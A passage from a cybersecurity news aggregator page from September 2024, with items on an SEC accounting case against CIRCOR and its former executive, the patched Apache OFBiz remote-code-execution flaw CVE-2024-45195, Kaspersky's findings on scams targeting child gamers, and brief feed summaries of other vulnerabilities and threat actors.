These actions, coupled with CIRCOR's cooperation with the SEC, led the Commission to decide against seeking a civil penalty against the company. According to Nicholas P. Grippo, Director of the SEC's Philadelphia Regional Office, "While this matter involves serious violations of the securities laws, once the company became aware of the violations, it promptly self-reported, cooperated, and remediated the gaps in its accounting systems. As also reflected in other recent Commission resolutions, this kind of response by a corporate entity can lead to significant benefits including, as here, no penalty."

Charges Against Bowerman
While CIRCOR has settled its case with the SEC, Bowerman faces a more severe set of legal consequences. The SEC has filed a complaint in the U.S. District Court for the District of Massachusetts, charging Bowerman with violations of multiple provisions of the federal securities laws, including those related to antifraud, financial reporting, books and records, and internal accounting controls. The SEC is seeking various forms of relief from Bowerman, including:
Injunctive relief to prevent him from engaging in further securities law violations.
Disgorgement of any ill-gotten gains, along with prejudgment interest.
Civil penalties to further hold Bowerman accountable for his actions.
These charges reflect the seriousness of Bowerman's alleged misconduct, which undermined the integrity of CIRCOR's financial disclosures and harmed investors who relied on the company's public filings. As part of the SEC's final order against CIRCOR, the company has agreed to cease and desist from future violations of the charged provisions of the securities laws.


 Vulnerability News

Apache OFBiz, a popular open-source enterprise resource planning (ERP) system, was recently found to harbor a critical Remote Code Execution (RCE) vulnerability. Tracked as CVE-2024-45195, the Apache OFBiz vulnerability could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers running OFBiz. Thankfully, the Apache security team has addressed the issue in the latest update, urging users to patch their installations immediately.

Understanding the Apache OFBiz RCE Vulnerability (CVE-2024-45195)
The vulnerability, discovered by Rapid7 security researchers, stems from missing authorization checks within the OFBiz web application. This weakness, categorized as a forced browsing vulnerability, exposes restricted paths to unauthenticated direct request attacks. "An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server," explained security researcher Ryan Emmons in a report. In simpler terms, an attacker could potentially exploit this vulnerability by crafting a specially designed URL that bypasses authentication controls. If successful, this could grant the attacker the ability to execute malicious code on the server, potentially leading to complete system compromise.

Potential Consequences of the Exploit
The consequences of exploiting CVE-2024-45195 could be severe for organizations relying on OFBiz. Here are some potential risks:
Data Theft and Leakage: Attackers could gain access to sensitive information stored on the server, including customer data, financial records, and intellectual property.
Disruption of Operations: The execution of malicious code could disrupt critical business processes, leading to downtime and financial losses.
Lateral Movement and Persistence: Exploiting this vulnerability could be a stepping stone for attackers to gain a foothold in the network and launch further attacks within the system.

Apache Patches Flaw
The Apache Software Foundation (ASF) has released a patch (version 18.12.16) that addresses CVE-2024-45195. This update strengthens the authorization checks within the OFBiz application, preventing unauthorized access to restricted paths.

Emmons explained that CVE-2024-45195 is a bypass of the patches for three other OFBiz vulnerabilities that were addressed in the past few months and are tracked as CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856. CVE-2024-32113 had been exploited in attacks using the Mirai botnet, highlighting the serious risks associated with such flaws. Meanwhile, CVE-2024-38856 was rated with a CVSS score of 9.8 by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), classifying it as critical in severity. The vulnerability allowed attackers to execute remote code without prior authentication, posing a severe risk to affected systems. "Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause," Emmons said. All of them are caused by a controller-view map fragmentation issue that enables attackers to execute code or SQL queries and achieve remote code execution without authentication. The latest patch "validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller."

Importance of Security in Open-Source Software
The discovery of CVE-2024-45195 serves as a reminder of the importance of security in open-source software. While open-source tools offer numerous benefits, they also require consistent vigilance and patching to address vulnerabilities promptly. Users are responsible for keeping their deployments up to date and implementing additional security measures to mitigate risks. The patching of CVE-2024-45195 is a positive step forward, but it's vital to remain vigilant. The ever-evolving cyber threat landscape necessitates continuous monitoring and proactive security measures. By implementing a comprehensive security strategy, organizations using OFBiz can minimize their attack surface and safeguard their critical data.


 News

The new school year brings with it new hopes, new subjects, new friends and new (and not-so-new) video games. After the long summer break, it's natural for kids to dive back into the cyberworld. When school's in, there's less time for hanging out with friends at the mall, so the digital space becomes the preferred meet-up place, including, of course, video games. But the world of gaming isn't quite as buddy-buddy as it might seem at first glance, so here too cybersecurity is a must. Sure, the games themselves are (mostly) fine; the problem is the parasitic scammers and cybercriminals they attract. Kaspersky experts have dug deep to find out which games and players are most at risk, and what to do about it. See the full version of our report for answers to these, and other related, questions.

Attackers love Minecraft
To fathom the threat landscape facing young gamers, our experts analyzed statistics from the global Kaspersky Security Network (KSN). KSN collects huge amounts of anonymous cyberthreat intelligence data that we receive from users on a voluntary basis. Selecting the most popular kids' games for the study, we found the top four most-attacked titles from July 2023 to July 2024 were Minecraft, Roblox, Among Us and Brawl Stars.

Game name                  Number of attack attempts
Minecraft                  3,094,057
Roblox                     1,649,745
Among Us                     945,571
Brawl Stars                  309,554
Five Nights at Freddy's      219,033
Fortnite                     165,859
Angry Birds                   66,754
The Legend of Zelda           33,774
Toca Life World               28,360
Valorant                      28,119
Mario Kart                    14,682
Subway Surfers                14,254
Overwatch 2                    9,076
Animal Crossing                8,262
Apex Legends                   8,133

That's right, more than three million attack attempts on Minecraft alone, almost twice as many as on second-place Roblox. Why? Because so many players are looking to download mods and cheats for Minecraft, and these often turn out to be malicious apps. As for the types of threats being spread, the most common are downloaders, adware, Trojans and backdoors. For several years now, malware downloaders have been the most active threat to the gaming industry: downloaders that tout themselves as the best Minecraft modloader you can get often turn out to download backdoors, Trojans and other threats.

Popular phishing scams
While it's easy to teach your kids to download apps only from trusted sources and use security solutions, keeping them safe from phishing is more of a challenge. Here, it pays to keep your ears and eyes sharp: the more you and your kids know and read about new scams, the better placed you are to spot them. What's more, most gaming scams tend to follow a pattern.

Free skins
Pretty much every top kids' game these days allows (or encourages) players to customize their character with skins that can cost serious money, millions of dollars in some cases! Most kids, of course, don't have that kind of cash under the bed, so they're always on the lookout for flashy item giveaways. One such act of generosity was uncovered by our experts. The scammers craftily exploited two things close to young gamers' hearts: Valorant and MrBeast. The first is a popular shooter game, while the other is one of the world's most successful YouTubers, with a 300 million+ subscriber base, mostly kids.
[Image: MrBeast and the makers of Valorant probably have no idea about their skin giveaway collaboration on a scam website]
The scammers invite gamers to log in to the phishing site using their game account credentials and then to open a treasure chest. Of course, there is no treasure, only a hijacked account.

Free in-game currency
Most in-game economies are built on two kinds of in-game currency: soft and hard. Soft currency is usually earned through playing the game; hard or premium currency is bought with real-world money. Naturally, it's the latter that attracts cybercriminals. For example, one scam asks Pokémon GO players to enter their game account username. That is followed by an "I'm not a bot" verification, after which the player lands on a site promising free in-game currency.
[Image: Catchy phishing site targeting young Pokémon GO players]
Such calls to action are a ruse to redirect users to a far more serious scam, where not only gaming accounts are at stake, but highly sensitive data like bank details.

Reward for in-game actions
"Do such-and-such and win a prize!" is a standard cybercriminal trick. We unearthed such a scam on a Roblox-related phishing site: victims were offered a US$100 Walmart gift card, the same amount for Taco Bell fast food outlets, and, for the especially greedy, US$25,000 in cash. But there's a catch: first your payment details, please!
[Image: Curious reward lineup: a US$100 voucher alongside US$25,000 in cash]
Since the youngest gamers don't yet have payment details of their own, they'll probably feed their parents' bank card numbers to the hungry site. And you can only imagine mom and dad's delight when the next billing statement arrives.

How young gamers can stay safe
Kids often lack basic cybersecurity skills, so they can easily fall into cybercriminal traps, for example when trying to download a free game, a mod or a must-have skin. That's why teaching kids cyber hygiene is one of the most important missions of modern parenting.
Help your child think up a unique, strong password, and get them used to using a password manager at an early age.
Tell your child about the risks they might face online. Our Kaspersky Cybersecurity Alphabet is a fun and informative way to teach your kids about new technologies and basic cyber hygiene, and refresh your own knowledge at the same time.
Install reliable protection for gamers on all devices.
Stay on top of the latest scams in the gaming world and warn your kids what to watch out for.
Use special apps to keep your kids safe, both online and offline.
For more great security tips for young gamers, check out the full version of our report.


 Feed

New threats, an overburdened workforce, and regulatory pressures mean cloud service providers need a more resilient model than the shared responsibility framework. That's where "shared fate" comes in.

 Malware and Vulnerabilities

Praetorian has uncovered GoffLoader, an in-memory execution tool that allows security professionals to run BOF and unmanaged Cobalt Strike PE files directly in memory without writing to disk.

 Malware and Vulnerabilities

Progress Software has alerted users to a critical vulnerability (CVE-2024-7591) in its LoadMaster ADC and load balancer solution. The flaw, with a CVSS score of 10, allows remote attackers to execute system commands without authentication.

 Threat Actors

The group, active since at least 2023, exclusively targets companies in these countries. They use modern techniques to gain initial access to systems, primarily through phishing emails with custom malware like PhantomDL and PhantomCore.

 Malware and Vulnerabilities

A critical vulnerability (CVE-2024-2169) in Webmin/Virtualmin control panels allows for launching DoS attacks. This flaw reveals IP addresses through the UDP service on port 10000, enabling attackers to create a loop of traffic between servers.

 Threat Actors

MuddyWater, an Iranian hacker group since 2017, has been using legitimate RMM software to target organizations globally, focusing on government, military, telecom, and oil sectors.

 Identity Theft, Fraud, Scams

The fake landing pages closely mimicked the real Lowe's portal, prompting employees to enter their sales numbers, passwords, and security question answers, which then were sent to attackers.

 Security Products & Services

Respotter is an open-source honeypot designed to detect attackers when they launch Responder within your environment. This application identifies active instances of Responder by exploiting its behavior when responding to any DNS query.

 Feed

Ubuntu Security Notice 6991-1 - It was discovered that AIOHTTP did not properly restrict file access when the 'follow_symlinks' option was set to True. A remote attacker could possibly use this issue to access unauthorized files on the system.

 Feed

Red Hat Security Advisory 2024-6418-03 - An update for bubblewrap and flatpak is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

 Feed

A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. "An attacker with no valid

 Feed

Telegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided. "If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself," Durov said in a 600-word statement on his Telegram account. "Using laws from the pre-smartphone era to charge a CEO with crimes committed

 Feed

Cybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts. The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1.  "The plugin suffers from an

 Feed

The 2024 State of the vCISO Report continues Cynomi’s tradition of examining the growing popularity of virtual Chief Information Security Officer (vCISO) services. According to the independent survey, the demand for these services is increasing, with both providers and clients reaping the rewards. The upward trend is set to continue, with even faster growth expected in the future. However,

 Feed

SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible. The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10. "An improper access control vulnerability has been identified in the SonicWall SonicOS management

 Feed

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk. The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances. In

 Feed

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages. These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com). Adversaries targeting open-source repositories across

 claims

Source: www.databreachtoday.com – Author: 1 Fraud Management & Cybercrime, Healthcare, HIPAA/HITECH. Experts Say Orgs That Handle Highly Sensitive Health Info Are Targets of Attacks. Marianne Kolbasuk McGee (HealthInfoSec) • September 5, 2024. Image: Planned Parenthood of Montana. Planned Parenthood of Montana, which provides patients with reproductive healthcare services including birth control […] The post RansomHub Claims Theft of Montana Planned Parenthood Data – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Customers

Source: www.databreachtoday.com – Author: 1 Kaspersky Hands Off 1 Million US Customers to UltraAV Amid Government Software Ban. Michael Novinson (MichaelNovinson) • September 5, 2024. U.S. customers of blacklisted Russian cybersecurity antivirus provider Kaspersky who didn't already swap out providers now know where they'll be getting endpoint protection going forward. See Also: Introduction […] The post Kaspersky US Customers Migrate to Pango's UltraAV After Ban – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning, Next-Generation Technologies & Secure Development. Ilya Sutskever Aims to Build Safe, Super-Intelligent AI. Rashmi Ramesh (rashmiramesh_) • September 5, 2024. Safe Superintelligence Inc. founder Ilya Sutskever says he will use $1 billion to "scale in peace." (Image: Shutterstock) A three-month-old startup promising […] The post Former OpenAI Scientist's Startup Raises $1B Seed Funding – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 FEMA CIO: Cyber Advisers Provide Critical Security Guidance Amid Recovery Efforts. Chris Riotta (@chrisriotta) • September 5, 2024. FEMA has deployed cyber advisers either physically or virtually to all disaster zones in 2024. (Image: Shutterstock) The U.S. Federal Emergency Management Agency isn't just about emergency water and shelters […] The post FEMA Has Begun Deploying Cyber Advisers to Disaster Zones – Source: www.databreachtoday.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

Aggregator history: Friday, September 06 (2024-09)